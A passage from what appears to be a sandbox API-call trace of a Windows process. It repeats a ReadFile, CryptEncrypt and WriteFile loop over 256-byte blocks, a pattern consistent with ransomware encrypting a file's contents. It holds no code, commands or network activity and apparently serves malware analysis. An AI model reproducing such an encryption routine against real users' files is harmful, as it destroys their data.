lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.628] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.628] GetLastError () returned 0x0 [0149.628] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.628] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.628] GetLastError () returned 0x0 [0149.628] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.628] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.628] GetLastError () returned 0x0 [0149.628] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.628] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.628] GetLastError () returned 0x0 [0149.628] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.628] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.628] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.629] GetLastError () returned 0x0 [0149.629] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.629] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.629] GetLastError () returned 0x0 [0149.629] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.629] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.629] GetLastError () returned 0x0 [0149.629] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.629] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.629] GetLastError () returned 0x0 [0149.629] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.629] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.629] GetLastError () returned 0x0 [0149.629] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.629] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.629] GetLastError () returned 0x0 [0149.629] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.629] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.629] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.629] GetLastError () returned 0x0 [0149.629] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.630] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.630] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.630] GetLastError () returned 0x0 [0149.630] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.630] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.630] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.630] GetLastError () returned 0x0 [0149.630] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.630] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.630] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.630] GetLastError () returned 0x0 [0149.630] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.630] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.630] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.630] GetLastError () returned 0x0 [0149.630] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.630] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.630] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.630] GetLastError () returned 0x0 [0149.630] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.630] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.630] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.630] GetLastError () returned 0x0 [0149.630] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.630] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.631] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.631] GetLastError () returned 0x0 [0149.631] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.631] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.631] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.631] GetLastError () returned 0x0 [0149.631] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.631] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.631] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.631] GetLastError () returned 0x0 [0149.631] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.631] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.631] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.631] GetLastError () returned 0x0 [0149.631] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.631] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.631] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.631] GetLastError () returned 0x0 [0149.631] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.631] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.631] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.631] GetLastError () returned 0x0 [0149.631] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.631] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.631] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.631] GetLastError () returned 0x0 [0149.632] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.632] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.632] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.632] GetLastError () returned 0x0 [0149.632] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.632] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.632] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.632] GetLastError () returned 0x0 [0149.632] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.632] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.632] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.632] GetLastError () returned 0x0 [0149.632] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.632] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.632] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.632] GetLastError () returned 0x0 [0149.632] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.632] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.632] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.632] GetLastError () returned 0x0 [0149.632] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.632] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.632] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.632] GetLastError () returned 0x0 [0149.632] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.633] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.633] GetLastError () returned 0x0 [0149.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.633] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.633] GetLastError () returned 0x0 [0149.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, 